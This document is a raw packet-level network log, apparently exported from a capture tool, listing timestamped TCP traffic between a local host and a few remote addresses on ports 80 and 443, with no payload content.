Nov 26, 2024 00:25:42.581943035 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.581975937 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.582009077 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.583127022 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.583180904 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.583221912 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.583291054 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.584374905 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.584430933 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.584558010 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.584629059 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.585567951 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.585618973 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.585650921 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.585726023 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.586909056 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.586951017 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.586973906 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.587011099 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.588047028 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.588109970 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.588149071 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.588193893 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.589234114 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.589304924 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.589335918 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.589374065 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.590504885 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.590657949 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.590728045 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.591650963 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.591708899 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.591762066 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.592883110 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.592948914 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.593014002 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.594064951 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.594347000 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.594424963 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.595542908 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.595556021 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.595598936 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.595598936 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.596677065 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.596739054 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.596740961 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.597536087 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.597733974 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.597804070 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.597856045 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.599014044 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.599133968 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.599204063 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.600202084 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.600214005 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.600270033 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.601397991 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.601471901 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.601531982 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.602663994 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.602735996 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.602802038 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.603847980 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.603903055 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.603935003 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.603990078 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.605087042 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.605123997 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.605166912 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.605166912 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.606193066 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.606276035 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.614057064 CET	443	49843	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:42.614078045 CET	443	49843	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:42.614136934 CET	49843	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:42.614156008 CET	443	49843	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:42.614290953 CET	49843	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:42.747942924 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.747972965 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.748004913 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.748023987 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.748162985 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.748172998 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.748248100 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.748258114 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.748277903 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.748330116 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.748445988 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.748457909 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.748495102 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.748498917 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.748507023 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.748577118 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.748682022 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.748692036 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.748727083 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.748771906 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.748816013 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.748826981 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.748863935 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.750130892 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.750140905 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.750360966 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.750885963 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.750896931 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.750937939 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.751568079 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.751629114 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.751658916 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.751687050 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.752685070 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.752768993 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.752779007 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.752815962 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.753663063 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.753704071 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.753709078 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.753760099 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.754884958 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.754895926 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.754945993 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.756092072 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.756102085 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.756148100 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.757379055 CET	443	49843	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:42.757395983 CET	443	49843	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:42.757455111 CET	49843	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:42.757468939 CET	443	49843	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:42.757522106 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.757524014 CET	49843	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:42.757533073 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.757561922 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.757594109 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.758430004 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.758470058 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.758526087 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.758564949 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.759628057 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.759666920 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.759747028 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.759803057 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.760876894 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.760962963 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.760998964 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.762046099 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.762057066 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.762093067 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.763366938 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.763376951 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.763402939 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.763427019 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.764453888 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.764653921 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.764677048 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.764709949 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.765609026 CET	443	49843	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:42.765659094 CET	49843	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:42.765667915 CET	443	49843	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:42.765681982 CET	443	49843	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:42.765717030 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.765726089 CET	49843	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:42.765727997 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.765764952 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.765780926 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.766985893 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.766999006 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.767056942 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.767056942 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.767995119 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.768006086 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.768040895 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.768327951 CET	49843	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:42.768342972 CET	443	49843	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:42.769109964 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.769120932 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.769186974 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.770313978 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.770327091 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.770350933 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.770370960 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.772063971 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.772073984 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.772111893 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.772663116 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.772722960 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.772773981 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.772914886 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.773917913 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.773958921 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.774041891 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.774168015 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.775024891 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.775089025 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.775271893 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.775944948 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.776335955 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.776386976 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.776387930 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.776426077 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.777451992 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.777515888 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.777518034 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.777764082 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.778575897 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.778636932 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.778732061 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.778774023 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.779757977 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.779865026 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.779881954 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.779941082 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.781014919 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.781025887 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.781068087 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.782150030 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.782222986 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.782403946 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.782455921 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.783329964 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.783375025 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.783530951 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.783627987 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.784573078 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.784627914 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.784670115 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.785749912 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.785826921 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.785888910 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.786025047 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.786879063 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.786923885 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.786926031 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.786963940 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.788101912 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.788152933 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.788191080 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.788279057 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.789345980 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.789359093 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.789407015 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.789469004 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.790409088 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.790458918 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.790539980 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.790720940 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.791626930 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.791704893 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.791745901 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.791870117 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.792835951 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.792905092 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.792908907 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.792994976 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.794075966 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.794204950 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.794260979 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.795295954 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.795351028 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.795355082 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.795439005 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.796399117 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.796451092 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.796458006 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.796504021 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.797600031 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.797661066 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.797679901 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.797739983 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.798748016 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.798815966 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.798856974 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.798989058 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.800014973 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.800025940 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.800071955 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.800127029 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.801178932 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.801189899 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.801259041 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.802320004 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.802371025 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.802375078 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.802409887 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.803472042 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.803525925 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.811918974 CET	443	49846	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:42.812087059 CET	443	49846	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:42.812170029 CET	49846	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:42.812450886 CET	49846	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:42.812474012 CET	443	49846	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:42.812480927 CET	49846	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:42.812488079 CET	443	49846	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:42.815268040 CET	49851	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:42.815356016 CET	443	49851	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:42.817545891 CET	49851	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:42.817704916 CET	49851	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:42.817723036 CET	443	49851	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:42.827855110 CET	49852	443	192.168.2.6	20.199.58.43
Nov 26, 2024 00:25:42.827887058 CET	443	49852	20.199.58.43	192.168.2.6
Nov 26, 2024 00:25:42.828033924 CET	49853	443	192.168.2.6	20.199.58.43
Nov 26, 2024 00:25:42.828041077 CET	49852	443	192.168.2.6	20.199.58.43
Nov 26, 2024 00:25:42.828057051 CET	443	49853	20.199.58.43	192.168.2.6
Nov 26, 2024 00:25:42.828133106 CET	49853	443	192.168.2.6	20.199.58.43
Nov 26, 2024 00:25:42.829226971 CET	49854	443	192.168.2.6	20.199.58.43
Nov 26, 2024 00:25:42.829233885 CET	443	49854	20.199.58.43	192.168.2.6
Nov 26, 2024 00:25:42.829291105 CET	49854	443	192.168.2.6	20.199.58.43
Nov 26, 2024 00:25:42.832928896 CET	49853	443	192.168.2.6	20.199.58.43
Nov 26, 2024 00:25:42.832954884 CET	443	49853	20.199.58.43	192.168.2.6
Nov 26, 2024 00:25:42.833153009 CET	49852	443	192.168.2.6	20.199.58.43
Nov 26, 2024 00:25:42.833167076 CET	443	49852	20.199.58.43	192.168.2.6
Nov 26, 2024 00:25:42.833353996 CET	49854	443	192.168.2.6	20.199.58.43
Nov 26, 2024 00:25:42.833364010 CET	443	49854	20.199.58.43	192.168.2.6
Nov 26, 2024 00:25:42.940313101 CET	443	49844	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:42.940468073 CET	443	49844	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:42.940529108 CET	49844	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:42.940740108 CET	49844	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:42.940749884 CET	443	49844	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:42.940762997 CET	49844	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:42.940768003 CET	443	49844	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:42.942405939 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.942476988 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.942518950 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.942578077 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.943104982 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.943118095 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.943170071 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.943170071 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.944323063 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.944334984 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.944344044 CET	49856	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:42.944365978 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.944391966 CET	443	49856	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:42.944397926 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.944588900 CET	49856	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:42.945394039 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.945470095 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.945554972 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.945606947 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:42.946614981 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:42.946665049 CET	49795	80	192.168.2.6	185.215.113.206
